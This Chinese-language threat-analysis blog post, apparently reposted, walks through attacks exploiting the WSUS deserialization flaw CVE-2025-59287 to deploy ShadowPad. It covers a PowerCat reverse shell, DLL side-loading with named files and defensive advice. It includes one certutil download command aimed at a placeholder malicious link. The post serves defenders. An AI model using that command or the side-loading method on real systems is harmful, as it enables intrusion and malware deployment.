文章总结: 这篇文章详细分析了CVE-2025-59287漏洞及其被黑客利用的攻击链,展示了如何通过反序列化漏洞获取WSUS服务器的系统权限,并利用白加黑DLL侧加载技术部署ShadowPad恶意软件。文章提供了攻击链的详细步骤,包括初始入侵、PowerCat反弹Shell、LOLBins战术使用以及DLL侧加载技术。作者建议IT人员立即打补丁、隔离WSUS服务器、监控LOLBins异常行为并排查可疑DLL文件,以防范此类攻击。
综合评分: 93
文章分类: 漏洞分析,威胁情报,应急响应,WEB安全,内网渗透
从CVE-2025-59287看攻击链:黑客如何用“白加黑”技术攻陷WSUS服务器?
原创
Hankzheng
技术修道场
2025年11月27日 07:50
广东
大家好,做运维和安全的兄弟们,最近的日子可能不太好过。
大家都知道,WSUS(Windows Server Update Services)在企业内网里那是“神”一般的存在。我们指望它给成千上万台终端打补丁、堵漏洞。但你有没有想过,如果有一天,这个负责“治病”的医生,自己变成了“病毒源”,会发生什么?
这可不是我在讲鬼故事。最近,安全圈炸锅了。微软上个月刚修补的一个WSUS高危漏洞(CVE-2025-59287),已经被黑客团伙疯狂利用。更要命的是,这次他们投送的“核弹”是著名的 ShadowPad(影帕)。
今天,我就带大家像剥洋葱一样,层层拆解这次攻击的技术细节。坐稳了,全是干货。
01 漏洞主角:CVE-2025-59287,内网的“破墙锤”
先说说这个漏洞。CVE-2025-59287 是一个典型的 反序列化(Deserialization)漏洞。
对于有几年开发经验的朋友来说,“反序列化”这个词简直就是噩梦。简单来说,WSUS 在处理某些输入数据时,没有进行严格的过滤和验证,直接把黑客构造的恶意数据还原成了对象并在内存中执行。
为什么它这么致命?
因为它允许 RCE(远程代码执行),而且一旦成功,攻击者拿到的不是普通用户权限,而是 System 权限!这意味着攻击者可以直接接管服务器,想干嘛就干嘛。对于那些暴露在公网上的 WSUS 实例,这简直就是给黑客送了一把万能钥匙。
02 攻击链复盘:教科书级别的“登堂入室”
根据 AhnLab 安全情报中心(ASEC)的最新报告,这帮黑客的手段非常老练,整个过程行云流水,堪称 APT 攻击的教科书。我们来拆解一下他们的攻击路径:
第一步:初始入侵与 PowerCat
攻击者首先利用 CVE-2025-59287 漏洞撕开缺口。紧接着,他们祭出了神器 —— PowerCat。
这就很有意思了。PowerCat 是 Netcat 的 PowerShell 版本。在这个阶段,黑客利用它直接反弹了一个 System 级别的 Shell(CMD)。
点评:PowerShell 真是把双刃剑,运维爱用,黑客更爱用。这属于典型的无文件攻击起手式。
第二步:LOLBins 战术(Living off the Land)
拿到 Shell 后,黑客没有急着上传自己的工具,而是玩了一手漂亮的 LOLBins(利用系统自带工具)。
他们调用了 Windows 自带的 certutil.exe 和 curl.exe。
certutil.exe -urlcache -split -f [恶意链接]
为什么要用这俩货? 因为它们是系统自带的“良民”,不仅由于有数字签名能绕过大多数杀毒软件的静态查杀,而且流量看起来也像是正常的系统更新或通信。
第三步:核心技术——“白加黑”DLL侧加载
这是整场攻击中最精彩,也是技术含量最高的部分。ShadowPad 是怎么跑起来的?它并没有直接运行一个 evil.exe,而是利用了 DLL Side-loading(DLL 侧加载) 技术。
-
🛠 白文件 :
黑客运行了一个合法的、带有正常数字签名的二进制文件
ETDCtrlHelper.exe。 -
💀 黑文件:
在同一个目录下,他们放置了一个恶意的 DLL 文件
ETDApix.dll。 -
⚡ 劫持执行:
当
ETDCtrlHelper.exe启动时,它会按照 Windows 的加载逻辑,优先加载目录下的ETDApix.dll。
一旦加载成功,这个恶意的 DLL 就会作为内存驻留的加载器,释放并执行真正的 ShadowPad 后门。
技术点拨: 这种“白加黑”手法在对抗查杀时非常有效,因为主进程是合法的,很多基于行为分析的安全软件会被迷惑,认为是正常程序在调用库文件。
03 幕后黑手:ShadowPad 的前世今生
提到 ShadowPad,搞威胁情报的朋友肯定不陌生。它被公认为是 PlugX 的继任者。
SentinelOne 曾经评价它为“间谍软件中的杰作”。早在 2015 年它就出道了,一直活跃至今。它的核心优势在于模块化设计:
-
不仅是后门:
它像个乐高积木,主模块只负责加载,其他功能(如键盘记录、截屏、文件窃取)都是通过插件动态加载到内存中的。
-
反取证能力极强:
它的很多操作都在内存中完成,落地的痕迹极少。
04 作为一个IT人,我们该怎么办?
说实话,看到 WSUS 被利用来分发病毒,确实挺讽刺的。但这给我们敲响了警钟:安全没有绝对的信任域。
给兄弟们几条实操建议:
✅ 即刻打补丁: 别犹豫了,赶紧检查你的 WSUS 服务器是否已经安装了 CVE-2025-59287 的修复补丁。
✅ 网络隔离: WSUS 服务器绝不应该直接暴露在公网上!如果有,赶紧收回内网或套上 VPN。
✅ 监控 LOLBins: 在 EDR 或 SIEM 上配置规则,监控 certutil.exe、bitsadmin.exe 等工具的异常网络连接行为。
✅ 排查“白加黑”: 关注服务器上是否存在不明的 DLL 文件,特别是那些和合法程序放在一起的奇怪 DLL。
最后说一句:
技术在进步,黑客也在进化。以前我们防病毒,现在我们得防“补丁服务器”。这场猫鼠游戏,永远不会结束,唯有保持学习和警惕,才能守住我们的“赛博疆土”。
如果你觉得这篇文章对你有帮助,欢迎点赞、关注、转发三连!
你的支持是我更新的最大动力。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:技术修道场 Hankzheng《从CVE-2025-59287看攻击链:黑客如何用“白加黑”技术攻陷WSUS服务器?》